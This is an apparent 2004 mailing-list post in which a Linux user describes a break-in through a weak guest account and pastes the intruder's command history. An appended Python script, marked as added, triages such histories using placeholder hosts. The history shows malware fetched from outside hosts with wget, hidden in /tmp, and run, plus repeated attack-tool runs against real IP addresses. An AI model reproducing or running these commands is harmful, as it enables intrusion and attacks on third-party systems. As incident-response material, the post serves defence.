[SLUG] Someone in my computer

From: Tevfik Yucek (yucek@eng.usf.edu)
Date: Tue Aug 24 2004 - 09:51:49 EDT


Hi all,

Last night I realized there was someone in my computer, Slackware 10.
I have sshd running and he/she/it connected to my computer and
executed the following commands.

I am usually not concerned with security and did not care much about
it until yesterday. I had a guest "user" account with password "guest"
and he/she/it used it.

So, here are my questions:
        - how does he/she/it know about my IP, how did they know I was
using Linux, and how did he/she/it get the password? Just guessing?
        - how can I kick a user if I notice that I have an uninvited
visitor? I had to stop the internet connection of my computer.
        - what do the commands below do, and should I do something about
them?

Thanks,
Tevfik

Here are the commands:

passwd
cat /etc/issue
cd /tmp
mdkri .src
cd .src
mkdir .src
cd .src
wget carmelo.go.ro/do.tgz
tar zxvf do.tgz
rm -rf do.tgz
./do
./do
wget 0kas.com/prt.tgz
tar zxvf prt.tgz
./x
./x
./x
./x
./x
./x
wget stefang.com/prostii/n
chmod +x n
./n
./n
./n
./n
./n
./n
./n
./n
./n
./n
ls
./n
./x
./x
./x
wget yahaa.at/p/90
./90
chmod +x 90
./90
./90
wget 0kas.com/Florin/flood.tar.gz
tar zxvf flood.tar.gz
rm -rf flood.tar.gz
ls
rm -rf prt.tgz
ls
rm -rf prt.tgz
cd belea
./stealth 218.38.3.83 53
cd /tmp/.src/belea
./stealth 80.97.245.241 53

./stealth
^[[A

w
cd /tmp/.src
cd belea
./steath 82.208.160.155 53
./steath 82.208.160.155 53
./steath 82.208.160.155 53
./stealth 82.208.160.155 53
./stealth 82.208.160.155 53
export PATH="."
bash
cd /tmp/.src/belea
w
w
cat psybnc.conf
locate psybnc.conf
./stealth 213.154.149.199 53
w
./stealth 213.233.97.53 53
./stealth 194.105.27.21 80
./stealth 81.196.147.218 53
./stealth 81.196.59.83 80
./stealth 81.196.59.83 53
cd /tmp/.src
cd belea
./stealth 80.96.146.171 53
cd /tmp/ .scr/belea
./stealth 81.196.147.170 53
./stealth 81.196.147.170 55
./stealth 81.196.147.170 53
./stealth 211.47.141.43 53
cd .src
ce belea
cd belea
./stealth 211.47.141.43
./stealth 211.47.141.43 53
./stealth 211.47.141.43 53
w
-----------------------------------------------------------------------
This list is provided as an unmoderated internet service by Networked
Knowledge Systems (NKS). Views and opinions expressed in messages
posted are those of the author and do not necessarily reflect the
official policy or position of NKS or any of its employees.
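
Added example, not part of the original post: a small Python triage pass over a shell history like the one above, listing what was downloaded, which hidden directories were used, and which host/port arguments were passed to locally run binaries. The name triage, the report keys and the sample history (placeholder hosts, documentation IP ranges) are assumptions made for illustration.

```python
import re
import shlex
from collections import Counter

# Constructed sample in the shape of the posted history; hosts and IPs are
# documentation placeholders (example.com, 192.0.2.0/24, 198.51.100.0/24).
SAMPLE_HISTORY = """\
cd /tmp
mkdir .src
cd .src
wget example.com/do.tgz
./do
cd /tmp/.src/belea
./stealth 192.0.2.10 53
./steath 192.0.2.10 53
./stealth 192.0.2.10 53
./stealth 198.51.100.7 80
./stealth 198.51.100.7
export PATH="."
"""

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

def triage(history):
    """Summarise downloads, hidden directories and host/port arguments."""
    report = {"downloads": [], "hidden_dirs": set(),
              "targets": Counter(), "path_changed": False}
    for line in history.splitlines():
        try:
            argv = shlex.split(line)
        except ValueError:      # unbalanced quotes in a history line
            continue
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        if cmd in ("wget", "curl"):
            report["downloads"] += [a for a in args if not a.startswith("-")]
        elif cmd in ("cd", "mkdir"):
            for path in args:
                parts = [p for p in path.split("/") if p not in ("", ".", "..")]
                if any(p.startswith(".") for p in parts):
                    report["hidden_dirs"].add(path)
        elif cmd == "export" and any(a.startswith("PATH=") for a in args):
            report["path_changed"] = True
        elif cmd.startswith("./") and args and IPV4.match(args[0]):
            # History records attempts, so a mistyped binary name still counts.
            port = args[1] if len(args) > 1 else None
            report["targets"][(args[0], port)] += 1
    return report
```

The history only shows what was typed, so the report is a starting list of files, directories and remote addresses to check against the filesystem and network logs.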


